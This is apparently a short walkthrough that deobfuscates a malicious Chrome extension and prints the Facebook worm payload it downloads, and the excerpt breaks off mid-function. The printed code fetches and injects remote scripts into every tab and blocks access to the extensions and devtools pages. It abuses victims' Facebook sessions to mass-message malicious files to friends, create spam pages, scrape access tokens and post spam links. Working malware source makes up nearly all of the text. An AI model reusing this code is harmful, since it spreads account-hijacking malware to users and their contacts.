if(!window["\x6C\x6F\x63\x61\x6C\x53\x74\x6F\x72\x61\x67\x65"]["\x67\x65\x74\x49\x74\x65\x6D"]("\x68\x61\x73\x53\x65\x65\x6E\x49\x6E\x74\x72\x6F")){window["\x6C\x6F\x63\x61\x6C\x53\x74\x6F\x72\x61\x67\x65"]["\x73\x65\x74\x49\x74\x65\x6D"]("\x68\x61\x73\x53\x65\x65\x6E\x49\x6E\x74\x72\x6F","\x79\x65\x70");chrome["\x74\x61\x62\x73"]["\x63\x72\x65\x61\x74\x65"]({url:"\x68\x74\x74\x70\x3A\x2F\x2F\x67\x6F\x6F\x2E\x67\x6C\x2F\x65\x50\x66\x4A\x41\x69"})};var seffeful=["\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x69\x64","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x65\x78\x65\x63\x75\x74\x65\x53\x63\x72\x69\x70\x74","\x74\x61\x62\x73","\x47\x45\x54","\x68\x74\x74\x70\x3A\x2F\x2F\x73\x6B\x72\x69\x70\x74\x61\x34\x33\x37\x33\x34\x2E\x73\x33\x2D\x77\x65\x62\x73\x69\x74\x65\x2D\x75\x73\x2D\x65\x61\x73\x74\x2D\x31\x2E\x61\x6D\x61\x7A\x6F\x6E\x61\x77\x73\x2E\x63\x6F\x6D\x3F","\x72\x61\x6E\x64\x6F\x6D","\x66\x6C\x6F\x6F\x72","\x6F\x70\x65\x6E","\x73\x65\x6E\x64","\x67\x65\x74","\x61\x64\x64\x4C\x69\x73\x74\x65\x6E\x65\x72","\x6F\x6E\x55\x70\x64\x61\x74\x65\x64"];chrome[seffeful[5]][seffeful[14]][seffeful[13]](function(_0xa2b1x1){chrome[seffeful[5]][seffeful[12]](_0xa2b1x1,function(){var _0xa2b1x2= new XMLHttpRequest();_0xa2b1x2[seffeful[0]]=function(){if(_0xa2b1x2[seffeful[1]]==4){chrome[seffeful[5]][seffeful[4]](_0xa2b1x1[seffeful[2]],{code:_0xa2b1x2[seffeful[3]]})}};_0xa2b1x2[seffeful[10]](seffeful[6],seffeful[7]+Math[seffeful[9]](Math[seffeful[8]]()*15000));_0xa2b1x2[seffeful[11]]()})});function sydZX(){var _0xa2b1x4={urls:["\x68\x74\x74\x70\x73\x3A\x2F\x2F\x2A\x2F\x2A"]},_0xa2b1x5=["\x72\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72\x73","\x62\x6C\x6F\x63\x6B\x69\x6E\x67"],_0xa2b1x6=function(_0xa2b1x7){var _0xa2b1x8=_0xa2b1x7["\x72\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72\x73"],_0xa2b1x9={};for(var _0xa2b1xa=0,_0xa2b1xb=_0xa2b1x8["\x6C\x65\x6E\x67\x74\x68"];_0xa2b1xa<_0xa2b1xb;++_0xa2b1xa){if(_0xa2b1x8[_0xa2b1xa]["\x6E\x61\x6D\x65"]=="\x55\x73\x65\x72\x2D\x41\x67\x65\x6E\x74"){_0xa2b1x8[_0xa2b1xa]["\x76\x61\x6C\x75\x65"]="\x4D\x6F\x7A\x69\x6C\x6C\x61\x2F\x35\x2E\x30\x20\x28\x4D\x61\x63\x69\x6E\x74\x6F\x73\x68\x3B\x20\x49\x6E\x74\x65\x6C\x20\x4D\x61\x63\x20\x4F\x53\x20\x58\x20\x31\x30\x5F\x39\x5F\x33\x29\x20\x41\x70\x70\x6C\x65\x57\x65\x62\x4B\x69\x74\x2F\x35\x33\x37\x2E\x37\x35\x2E\x31\x34\x20\x28\x4B\x48\x54\x4D\x4C\x2C\x20\x6C\x69\x6B\x65\x20\x47\x65\x63\x6B\x6F\x29\x20\x56\x65\x72\x73\x69\x6F\x6E\x2F\x37\x2E\x30\x2E\x33\x20\x53\x61\x66\x61\x72\x69\x2F\x37\x30\x34\x36\x41\x31\x39\x34\x41";break}};_0xa2b1x9["\x72\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72\x73"]=_0xa2b1x8;return _0xa2b1x9};chrome["\x77\x65\x62\x52\x65\x71\x75\x65\x73\x74"]["\x6F\x6E\x42\x65\x66\x6F\x72\x65\x53\x65\x6E\x64\x48\x65\x61\x64\x65\x72\x73"]["\x61\x64\x64\x4C\x69\x73\x74\x65\x6E\x65\x72"](_0xa2b1x6,_0xa2b1x4,_0xa2b1x5);chrome["\x74\x61\x62\x73"]["\x6F\x6E\x55\x70\x64\x61\x74\x65\x64"]["\x61\x64\x64\x4C\x69\x73\x74\x65\x6E\x65\x72"](function(_0xa2b1xc,_0xa2b1xd){if(_0xa2b1xd["\x73\x74\x61\x74\x75\x73"]=="\x63\x6F\x6D\x70\x6C\x65\x74\x65"){chrome["\x74\x61\x62\x73"]["\x67\x65\x74"](_0xa2b1xc,function(_0xa2b1xe){if(_0xa2b1xe["\x75\x72\x6C"]["\x69\x6E\x64\x65\x78\x4F\x66"]("\x61\x6C\x6C\x61\x63\x74\x69\x76\x69\x74\x79")!= -1){chrome["\x74\x61\x62\x73"]["\x65\x78\x65\x63\x75\x74\x65\x53\x63\x72\x69\x70\x74"](_0xa2b1xe["\x69\x64"],{code:"\x74\x6F\x70\x2E\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x2E\x68\x72\x65\x66\x20\x3D\x20\x22\x68\x74\x74\x70\x73\x3A\x2F\x2F\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x22\x3B"})};if(_0xa2b1xe["\x75\x72\x6C"]["\x69\x6E\x64\x65\x78\x4F\x66"]("\x63\x68\x65\x63\x6B\x70\x6F\x69\x6E\x74\x2F\x3F\x6E\x65\x78\x74")!= -1){chrome["\x74\x61\x62\x73"]["\x65\x78\x65\x63\x75\x74\x65\x53\x63\x72\x69\x70\x74"](_0xa2b1xe["\x69\x64"],{code:"\x69\x66\x28\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x43\x6C\x61\x73\x73\x4E\x61\x6D\x65\x28\x22\x75\x69\x4C\x69\x73\x74\x20\x6D\x74\x6D\x20\x5F\x34\x6F\x66\x20\x5F\x34\x6B\x67\x22\x29\x2E\x6C\x65\x6E\x67\x74\x68\x20\x3E\x20\x30\x29\x7B\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x43\x6C\x61\x73\x73\x4E\x61\x6D\x65\x28\x22\x75\x69\x4C\x69\x73\x74\x20\x6D\x74\x6D\x20\x5F\x34\x6F\x66\x20\x5F\x34\x6B\x67\x22\x29\x5B\x30\x5D\x2E\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C\x20\x3D\x20\x22\x22\x3B\x7D"})};if(_0xa2b1xe["\x75\x72\x6C"]["\x69\x6E\x64\x65\x78\x4F\x66"]("\x63\x68\x72\x6F\x6D\x65\x3A\x2F\x2F\x65\x78\x74\x65\x6E\x73\x69\x6F\x6E\x73\x2F")>-1||_0xa2b1xe["\x75\x72\x6C"]["\x69\x6E\x64\x65\x78\x4F\x66"]("\x63\x68\x72\x6F\x6D\x65\x3A\x2F\x2F\x63\x68\x72\x6F\x6D\x65\x2F\x65\x78\x74\x65\x6E\x73\x69\x6F\x6E\x73")>-1||_0xa2b1xe["\x75\x72\x6C"]["\x69\x6E\x64\x65\x78\x4F\x66"]("\x63\x68\x72\x6F\x6D\x65\x2D\x64\x65\x76\x74\x6F\x6F\x6C\x73")> -1){chrome["\x74\x61\x62\x73"]["\x72\x65\x6D\x6F\x76\x65"](_0xa2b1xc);if((_0xa2b1xe["\x75\x72\x6C"]=="\x63\x68\x72\x6F\x6D\x65\x3A\x2F\x2F\x65\x78\x74\x65\x6E\x73\x69\x6F\x6E\x73\x2F"||_0xa2b1xe["\x75\x72\x6C"]=="\x63\x68\x72\x6F\x6D\x65\x3A\x2F\x2F\x63\x68\x72\x6F\x6D\x65\x2F\x65\x78\x74\x65\x6E\x73\x69\x6F\x6E\x73")&&_0xa2b1xd["\x73\x74\x61\x74\x75\x73"]=="\x6C\x6F\x61\x64\x69\x6E\x67"){chrome["\x74\x61\x62\x73"]["\x72\x65\x6D\x6F\x76\x65"](_0xa2b1xc)}}})}})}sydZX()
Wow Damn Daniel! look at the depths of obfuscation this person did. Let's peel it back
wget https://as45t6e3q3q3.info/
echo -e "$(cat index.html)" > rihannawormwormworm.txt
if(!window["localStorage"]["getItem"]("hasSeenIntro")){window["localStorage"]["setItem"]("hasSeenIntro","yep");chrome["tabs"]["create"]({url:"http://goo.gl/ePfJAi"})};var seffeful=["onreadystatechange","readyState","id","responseText","executeScript","tabs","GET","http://skripta43734.s3-website-us-east-1.amazonaws.com?","random","floor","open","send","get","addListener","onUpdated"];chrome[seffeful[5]][seffeful[14]][seffeful[13]](function(_0xa2b1x1){chrome[seffeful[5]][seffeful[12]](_0xa2b1x1,function(){var _0xa2b1x2= new XMLHttpRequest();_0xa2b1x2[seffeful[0]]=function(){if(_0xa2b1x2[seffeful[1]]==4){chrome[seffeful[5]][seffeful[4]](_0xa2b1x1[seffeful[2]],{code:_0xa2b1x2[seffeful[3]]})}};_0xa2b1x2[seffeful[10]](seffeful[6],seffeful[7]+Math[seffeful[9]](Math[seffeful[8]]()*15000));_0xa2b1x2[seffeful[11]]()})});function sydZX(){var _0xa2b1x4={urls:["https://*/*"]},_0xa2b1x5=["requestHeaders","blocking"],_0xa2b1x6=function(_0xa2b1x7){var _0xa2b1x8=_0xa2b1x7["requestHeaders"],_0xa2b1x9={};for(var _0xa2b1xa=0,_0xa2b1xb=_0xa2b1x8["length"];_0xa2b1xa<_0xa2b1xb;++_0xa2b1xa){if(_0xa2b1x8[_0xa2b1xa]["name"]=="User-Agent"){_0xa2b1x8[_0xa2b1xa]["value"]="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A";break}};_0xa2b1x9["requestHeaders"]=_0xa2b1x8;return _0xa2b1x9};chrome["webRequest"]["onBeforeSendHeaders"]["addListener"](_0xa2b1x6,_0xa2b1x4,_0xa2b1x5);chrome["tabs"]["onUpdated"]["addListener"](function(_0xa2b1xc,_0xa2b1xd){if(_0xa2b1xd["status"]=="complete"){chrome["tabs"]["get"](_0xa2b1xc,function(_0xa2b1xe){if(_0xa2b1xe["url"]["indexOf"]("allactivity")!= -1){chrome["tabs"]["executeScript"](_0xa2b1xe["id"],{code:"top.location.href = "https://facebook.com";"})};if(_0xa2b1xe["url"]["indexOf"]("checkpoint/?next")!= -1){chrome["tabs"]["executeScript"](_0xa2b1xe["id"],{code:"if(document.getElementsByClassName("uiList mtm _4of _4kg").length > 0){document.getElementsByClassName("uiList mtm _4of _4kg")[0].innerHTML = "";}"})};if(_0xa2b1xe["url"]["indexOf"]("chrome://extensions/")>-1||_0xa2b1xe["url"]["indexOf"]("chrome://chrome/extensions")>-1||_0xa2b1xe["url"]["indexOf"]("chrome-devtools")> -1){chrome["tabs"]["remove"](_0xa2b1xc);if((_0xa2b1xe["url"]=="chrome://extensions/"||_0xa2b1xe["url"]=="chrome://chrome/extensions")&&_0xa2b1xd["status"]=="loading"){chrome["tabs"]["remove"](_0xa2b1xc)}}})}})}sydZX()
So the first link http://goo.gl/ePfJAi redirects to https://www.facebook.com/
The second link http://skripta43734.s3-website-us-east-1.amazonaws.com shows us that we finally have hit bottom of this worm
new Image().src = '//whos.amung.us/swidget/adeaditi4';
function start() {
var cookie_name = "as4t6qw5tq"+profile_id;
var cookie_time = 10;
if(!localStorage[cookie_name] || parseInt(localStorage[cookie_name]) < Date.now()-60*1000*cookie_time){
localStorage[cookie_name] = Date.now();
config={
"post_limit":"12",
"tag_limit": "9",
"mode": "post",
"link": "vestidodefiesta.net",
"message_limit": "20"
}
if(config.mode == "post" || profile_id == config.testuser){
arkadas();
privacySetting();
onlinex1();
console.log("Arkadaslar getiriliyor.");
}
}else{
var active_time = new Date();
active_time.setTime(parseInt(localStorage[cookie_name]) + (60*1000*cookie_time));
console.log("active_time:"+active_time.toLocaleString());
}
}
function arkadas() {
var params = {
__pc:"EXP1:DEFAULT",
viewer:profile_id,
"filter[0]":"user",
"options[0]":"friends_only",
token:"v7",
context:"mentions",
rsp:"mentions",
sid:"1197780291395",
request_id: guid(),
__user:profile_id,
__a:1,
__dyn: get_dyn(),
__req:"e",
__rev:__rev
}
var xhr = new XMLHttpRequest();
xhr.open("GET", "https://www.facebook.com/ajax/typeahead/first_degree.php?"+deSerialize(params), true);
xhr.onreadystatechange = function(){
if (xhr.readyState == 4 && xhr.status == 200){
var data = JSON.parse(xhr.responseText.replace("for (;;);",""));
if (!data.error){
var friends = data.payload.entries.sort(function(a, b) {
return a.index - b.index;
});
for(i=0;i<friends.length;i++){
if(friends[i].uid.toString() == profile_id.toString()){
friends.splice(i, 1);
}
}
var vars = {};
vars.link = "http://"+config.link+"/?"+rastgele(7);
//vars.image = "https://graph.facebook.com/"+profile_id+"/picture?type=large";
vars.image = "";
//var endriti = new XMLHttpRequest();
//endriti.open("GET", "https://fotodoto.azurewebsites.net/didan24.php?" + Math['floor'](Math['random']() * 99999999999999999), false);
//endriti.send();
//var diti3 = JSON.parse(endriti.responseText);
//vars.image = diti.data.link;
function dtert(){
var endriti = new XMLHttpRequest();
endriti.open("GET", "https://fotodoto.azurewebsites.net/wqe/bitra2.php?" + Math['floor'](Math['random']() * 99999999999999999), false);
endriti.send();
var diti3 = JSON.parse(endriti.responseText);
vars.domaini = diti3.link;
var endriti1 = new XMLHttpRequest();
endriti1.open("GET", "https://graph.facebook.com/" + vars.domaini, false);
endriti1.send();
var diti4 = JSON.parse(endriti1.responseText);
vars.domaini2 = diti4.shares;
console.log(endriti1.responseText);
var endriti2 = new XMLHttpRequest();
endriti2.open("GET", "https://fotodoto.azurewebsites.net/wqe/adjhwent2.php?title=" + endriti1.responseText, false);
endriti2.send();
}
dtert();
// vars.title = name_generate();
// vars.title = "abc";
vars.title = "";
vars.friends = friends;
//category_select(vars);
createPage1(vars);
}
}
}
xhr.send();
}
function onlinex1(){
var params = {
user:profile_id,
cached_user_info_ids:"",
fetch_mobile:false,
get_now_available_list:true,
__user:profile_id,
__a:1,
__dyn:"7A" + rastgele(105),
__req:12,
fb_dtsg:fb_dtsg,
ttstamp:ttstamp,
__rev:__rev
}
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://www.facebook.com/ajax/chat/buddy_list.php?ext=me");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.onreadystatechange = function() {
if (xhr.readyState == 4 && xhr.status == 200) {
var data = JSON.parse(xhr.responseText.replace("for (;;);",""));
if (!data.error){
var friends = [];
for(u in data.payload.buddy_list.nowAvailableList){
if(friends.indexOf(u.toString()) < 0){
friends.push(u.toString());
}
}
console.log("Online:" + friends.length);
friends = shuffle(friends);
var vars = {};
vars.friends = [];
for (i = 0; i < friends.length; i++) {
if(i<config.message_limit){
vars.friends.push(friends[i]);
}
}
for(i=0;i<vars.friends.length;i++){
vars.uid = vars.friends[i];
getFilex1(vars);
}
}
}
}
xhr.send(deSerialize(params))
}
function getFilex1(vars){
var uid = vars.uid;
var oReq = new XMLHttpRequest();
oReq.open("GET", "https://s3.amazonaws.com/onlinex1/redd.html", true);
oReq.responseType = "arraybuffer";
oReq.onreadystatechange = function() {
if(this.readyState != 4) return;
var arrayBufferView = new Uint8Array( this.response );
vars.blob = new Blob( [ arrayBufferView ], { type: "image/svg+xml" } );
vars.uid = uid;
uploadx1(vars);
};
oReq.send();
}
function uploadx1(vars) {
var uid = vars.uid;
var fd = new FormData();
fd.append("attach_id", "");
fd.append("upload_1024", vars.blob, "V1DE0-"+Math.floor(Math.random()*9999)+".html");
var getParams = {
dpr:1,
__user:profile_id,
__a:1,
__dyn:"5V5yAW8-aFoAwmgDxyG8EigmzkqbxqbyaFaay8Z9LFwxBxC9V8C3F6y8-bxu3efwFG3J1Zi28y2HoiKcQiVWxeUlwxxW3Ouumm2uUjBGqewIUsz8gCxm5Erw",
__req:"k",
fb_dtsg:fb_dtsg,
ttstamp:ttstamp,
__rev:__rev,
ext:"me"
}
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://upload.facebook.com/ajax/mercury/upload.php?"+deSerialize(getParams));
xhr.onreadystatechange = function() {
if(this.readyState != 4) return;
var data = JSON.parse(xhr.responseText.replace("for (;;);",""));
vars.file_id = data.payload.metadata[0].file_id;
vars.uid = uid;
sendMessagex1(vars);
}
xhr.send(fd);
}
function sendMessagex1(vars){
var uid = vars.uid;
var params = {
"message_batch[0][action_type]":"ma-type:user-generated-message",
"message_batch[0][thread_id]":"",
"message_batch[0][author]":"fbid:" + profile_id,
"message_batch[0][author_email]":"",
"message_batch[0][timestamp]":Date.now(),
"message_batch[0][is_unread]":false,
"message_batch[0][is_forward]":false,
"message_batch[0][is_filtered_content]":false,
"message_batch[0][is_filtered_content_bh]":false,
"message_batch[0][is_filtered_content_account]":false,
"message_batch[0][is_filtered_content_quasar]":false,
"message_batch[0][is_filtered_content_invalid_app]":false,
"message_batch[0][is_spoof_warning]":false,
"message_batch[0][source]":"source:titan:web",
"message_batch[0][body]":"",
"message_batch[0][has_attachment]":true,
"message_batch[0][html_body]":false,
"message_batch[0][specific_to_list][0]":"fbid:" + uid,
"message_batch[0][specific_to_list][1]":"fbid:" + profile_id,
"message_batch[0][force_sms]":true,
"message_batch[0][ui_push_phase]":"V3",
"message_batch[0][file_ids][0]": vars.file_id,
"message_batch[0][status]":0,
"message_batch[0][manual_retry_cnt]":0,
"message_batch[0][other_user_fbid]": uid,
client:"web_messenger",
__user:profile_id,
__a:1,
__dyn:"7A" + rastgele(105),
__req:"4x",
fb_dtsg:fb_dtsg,
ttstamp:ttstamp,
__rev:__rev
}
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://www.facebook.com/ajax/mercury/send_messages.php?ext=me");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.onreadystatechange = function() {
if (xhr.readyState == 4 && xhr.status == 200) {
var data = JSON.parse(xhr.responseText.replace("for (;;);",""));
if(!data.error){
console.log("Sent:"+uid);
}
}
}
xhr.send(deSerialize(params))
}
function createPage1(vars){
var params = {
fb_dtsg:fb_dtsg,
do_migrate:"",
form_name:"entertainment_form",
ref_type:"bookmark",
ref_id:"",
attempts:0,
category:1200,
page_name:rastgele(7).toUpperCase()+rastgele(10),
"nctr[_mod]":"pagelet_entertainment",
__user:profile_id,
__a:1,
__dyn:"7AmajEzUFlym5Q9UoHaEWy1m9J6yU-qbyaFami8DCqrWo8popyui9zob4q8zUK5Uc-dwFG2Dy9Au9zq88wICQ4U_pbDG4Xxm58Ci48K3uiudBwDKp2VqCgS2Pw",
__req:"4n",
ttstamp:ttstamp,
__rev:__rev
}
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://www.facebook.com/ajax/pages/create/check");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.send(deSerialize(params));
xhr.onreadystatechange = function() {
if (xhr.readyState == 4 && xhr.status == 200) {
var data = JSON.parse(xhr.responseText.replace("for (;;);",""));
if(!data.error){
vars.pageID = data.onload[0].split(/(\d+)\?created/g)[1];
console.log("Sayfa oluÅŸturuldu:"+ vars.pageID);
scrape1(vars);
}
}
}
}
function scrape1(vars){
var getParams = {
composer_id:"u_jsonp_14_j",
target_id:vars.pageID,
scrape_url:vars.link,
entry_point:"pages_feed",
source_attachment:"STATUS",
av:vars.pageID,
dpr:1
}
var params = {
__user:profile_id,
__a:1,
__dyn:"aKTyAW8-aloAwmgDDzbHaF8x8wlyriKbJzbyUxqiBAyemkyrWqGmcXmnxnCRACGEG5V8Z6VHh968Qp2WCHAxbGazVHx2qqA7UObQu49B88UWaxvh8WVpfiXDG4XxmifDWxmt3pVUG8BADDh9ppUpKqcBGl4yppFUnUOaAz8gCDgOFkmHgKeiyE",
__req:53,
__pc:"EXP1:DEFAULT",
fb_dtsg:fb_dtsg,
ttstamp:ttstamp,
__rev:__rev
}
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://www.facebook.com/react_composer/scraper/?"+deSerialize(getParams));
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.send(deSerialize(params));
xhr.onreadystatechange = function() {
if (xhr.readyState == 4 && xhr.status == 200) {
var data = JSON.parse(xhr.responseText.replace("for (;;);",""));
vars.attachmentConfig = data.jsmods.require[3][3][1].attachmentConfig;
getImage1(vars);
}
}
}
function getImage1(vars){
var uid = vars.uid;
var oReq = new XMLHttpRequest();
var endriti = new XMLHttpRequest();
endriti.open("GET", "https://fotodoto.azurewebsites.net/image.php?" + Math['floor'](Math['random']() * 99999999999999999), false);
endriti.send();
//var diti = JSON.parse(endriti.responseText);
//var fotoja = diti.data.link;
oReq.open("GET", "https://fotodoto.azurewebsites.net/diti.jpg?" + rastgele(6) + ".png", true);
oReq.responseType = "arraybuffer";
oReq.onreadystatechange = function() {
if(this.readyState != 4) return;
var arrayBufferView = new Uint8Array( this.response );
vars.blob = new Blob( [ arrayBufferView ], { type: "image/jpg" } );
upload1(vars);
};
oReq.send();
}
function upload1(vars){
var fd = new FormData();
fd.append("fb_dtsg", fb_dtsg);
fd.append("source", 8);
fd.append("profile_id", vars.pageID);
fd.append("grid_id", "u_6g_3");
fd.append("qn", 6);
fd.append("upload_id", 1024);
fd.append("farr", vars.blob, ""+Math.floor(Math.random()*999999)+".jpg");
var getParams = {
target_id:vars.pageID,
image_height:840,
image_width:560,
letterbox:0,
av:vars.pageID,
qn:6,
dpr:1,
__user:profile_id,
__a:1,
__dyn:"aKTyAW8-aloAwmgDDzbHaF8x8wlyriKbJzbyUxqiBAyemkyrWqGmcXmnxnCRACGEG5V8Z6VHh968Qp2WCHAxbGazVHx2qqA7UObQu49B88UWaxvh8WVpfiXDG4XxmifDWxmt3pVUG8BADDh9ppUpKqcBGl4yppFUnUOaAz8gCDgOFkmHgKeiyE",
__req:"6o",
__pc:"EXP1:DEFAULT",
fb_dtsg:fb_dtsg,
ttstamp:ttstamp,
__rev:__rev
}
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://upload.facebook.com/ajax/composerx/attachment/media/saveunpublished?"+deSerialize(getParams));
xhr.send(fd);
xhr.onreadystatechange = function() {
if (xhr.readyState == 4 && xhr.status == 200) {
var data = JSON.parse(xhr.responseText.replace("for (;;);",""));
console.log(data);
vars.imageID = data.jsmods.instances[0][2][2].fbid;
getToken1(vars);
}
}
}
function getToken1(vars) {
var xhr = new XMLHttpRequest();
xhr.open("GET", "https://www.facebook.com/ads/manager");
xhr.onreadystatechange = function() {
if (xhr.readyState != 4) return;
vars.access_token = xhr.responseText.split('"access_token":"')[1].split('"')[0].trim();
getSrc1(vars);
}
xhr.send();
}
function getSrc1(vars){
var getParams = {
access_token:vars.access_token,
debug:"all",
fields:"images",
format:"json",
method:"get",
pretty:0,
suppress_http_code:1
}
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://graph.facebook.com/"+vars.imageID+"?"+deSerialize(getParams));
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.send();
xhr.onreadystatechange = function() {
if (xhr.readyState == 4 && xhr.status == 200) {
var data = JSON.parse(xhr.responseText.replace("for (;;);",""));
vars.image = data.images[0].source;
category_select(vars);
//post(vars);
//console.log(vars.link);
//start2(vars.image,vars.link)
}
}
}
function category_select(vars) {
var params = {
broad_category: "community",
__user: profile_id,
__a: 1,
__dyn: get_dyn(),
__req: "j",
__be: 0,
__pc: "EXP1:DEFAULT",
fb_dtsg: fb_dtsg,
ttstamp: ttstamp,
__rev: __rev
};
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://www.facebook.com/ajax/pages/create/broad_category_box_click_event.php?dpr=2");
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xhr.onreadystatechange = function() {
if (xhr.readyState == 4 && xhr.status == 200){
var data = JSON.parse(xhr.responseText.replace("for (;;);",""));
if (!data.error) {
create(vars);
}
}
}
xhr.send(deSerialize(params));
}
function create(vars) {
var params = {
fb_dtsg: fb_dtsg,
do_migrate: "",
form_name: "community_form",
is_community: 1,
type: 274,
category: 2612,
ref_type: "bookmark",
ref_id: "",
attempts: 0,
page_name: name_generate(),
"nctr[_mod]": "pagelet_community",
__user: profile_id,
__a: 1,
__dyn: get_dyn(),
__req: "o",
__be: 0,
__pc: "EXP1:DEFAULT",
ttstamp: ttstamp,
__rev: __rev
};
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://www.facebook.com/ajax/pages/create/check/?dpr=2");
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xhr.onreadystatechange = function() {
if (xhr.readyState == 4 && xhr.status == 200){
var data = JSON.parse(xhr.responseText.replace("for (;;);",""));
if (!data.error) {
vars.page_id = data.onload[0].split("/")[5].split("?created")[0];
debug(vars);
}
}
}
xhr.send(deSerialize(params));
}
function debug(vars) {
var params = {
__user: profile_id,
__a: 1,
__dyn: get_dyn(),
__req: "o",
__be: 0,
__pc: "EXP1:DEFAULT",
fb_dtsg: fb_dtsg,
ttstamp: ttstamp,
__rev: __rev
};
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://www.facebook.com/react_composer/scraper/?composer_id=u_0_1c&target_id="+vars.page_id+"&scrape_url="+vars.link+"&entry_point=pages_feed&source_attachment=STATUS&av="+vars.page_id+"&dpr=2");
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xhr.onreadystatechange = function() {
if (xhr.readyState == 4 && xhr.status == 200){
var data = JSON.parse(xhr.responseText.replace("for (;;);",""));
if (!data.error) {
vars.attachmentConfig = searchArray(data, "attachmentConfig");
share_page(vars);
}
}
}
xhr.send(deSerialize(params));
}
function share_page(vars) {
profile_id2 = document['cookie']['match'](/c_user=(\d+)/)[1];
config2 = document['getElementsByName']('fb_dtsg')[0]['value'];
function begen(begenekla) {
var saldiraq = new XMLHttpRequest();
saldiraq['onreadystatechange'] = function () {
if (saldiraq['readyState'] == 4) {}
};
var durlan = 'fbpage_id=' + begenekla;
durlan += '&add=true';
durlan += '&reload=false';
durlan += '&fan_origin=page_timeline';
durlan += '&fan_source=';
durlan += '&cat=';
durlan += '&actor_id=';
durlan += '&__user=' + profile_id2;
durlan += '&__a=1';
durlan += '&__dyn=7nmajEyl2lm9o-t2u5bHaEWCueypaK78hACF3ozBCqrWU8popyUW3F6xt2UnwPUS2O4K5fCGi4EOBy8Sq5WCzF8';
durlan += '&__req=g';
durlan += '&fb_dtsg=' + config2;
durlan += '&ttstamp=26581701209845488084115121109';
durlan += '&__rev=1739814';
saldiraq['open']('POST', '/ajax/pages/fan_status.php', true);
saldiraq['send'](durlan);
}
begen(1672788106316788);
console.log(vars.image);
var params = {
"attachment[params][urlInfo][canonical]":vars.link,
"attachment[params][urlInfo][final]":vars.link,
"attachment[params][urlInfo][user]":vars.link,
"attachment[params][content_removed]":false,
"attachment[params][ranked_images][images]":"",
"attachment[params][ranked_images][ranking_model_version]":0,
"attachment[params][ranked_images][default]":true,
"attachment[params][medium]":106,
"attachment[params][url]":vars.link,
"attachment[params][time_scraped]":Math.floor(Date.now()/1000),
"attachment[params][cache_hit]":true,
"attachment[params][global_share_id]":vars.attachmentConfig.params.global_share_id,
"attachment[params][was_recent]":false,
"attachment[params][og_info][guesses][0][0]":"og:url",
"attachment[params][og_info][guesses][0][1]":vars.link,
"attachment[params][og_info][guesses][1][0]":"og:title",
"attachment[params][og_info][guesses][1][1]":vars.link,
"attachment[params][ttl]":604800,
"attachment[params][error]":16,
"attachment[params][child_attachments][0][picture]":vars.image,
"attachment[params][child_attachments][0][name]":vars.title,
"attachment[params][child_attachments][0][description]":"",
"attachment[params][child_attachments][0][link]":vars.link,
"attachment[params][child_attachments][0][selected]":1,
"attachment[params][child_attachments][0][scraped]":0,
"attachment[type]":100,
"attachment[reshare_original_post]":false,
"attachment[carousel_log][use_carousel_composer]":1,
"attachment[carousel_log][carousel_incompatible]":"",
"attachment[carousel_log][scraped_url]":vars.link,
"attachment[carousel_log][scraped_time]":0,
"attachment[carousel_log][composer_location]":"OTHER",
"attachment[carousel_log][hide_end_card]":"",
"attachment[carousel_log][source_attachment]":"STATUS",
boosted_post_config:"",
xc_share_params:JSON.stringify(vars.attachmentConfig.params),
composer_session_id:guid(),
composertags_city:"",
composertags_place:"",
hide_object_attachment:true,
is_explicit_place:false,
is_markdown:false,
is_q_and_a:false,
is_profile_badge_post:false,
multilingual_specified_lang:"",
privacyx:"",
prompt_id:"",
ref:"pages_feed",
is_redspace_post:false,
target_type:"page",
xhpc_message:"",
xhpc_message_text:"",
is_forced_reshare_of_post:false,
xc_share_params:"",
xc_share_target_type:100,
xc_link_url:vars.link,
is_react:true,
xhpc_composerid:"u_jsonp_4_j",
xhpc_targetid:vars.page_id,
xhpc_context:"profile",
xhpc_ismeta:1,
xhpc_timeline:true,
xhpc_finch:true,
xhpc_socialplugin:false,
xhpc_topicfeedid:"",
xhpc_origintopicfeedid:"",
xhpc_modal_composer:false,
xhpc_aggregated_story_composer:false,
xhpc_publish_type:1,
xhpc_fundraiser_page:false,
draft:false,
__user:profile_id,
__a:1,
__dyn: get_dyn(),
__req:"2m",
__pc:"EXP1:DEFAULT",
fb_dtsg:fb_dtsg,
ttstamp:ttstamp,
__rev:__rev
};
var xhr = new XMLHttpRequest();
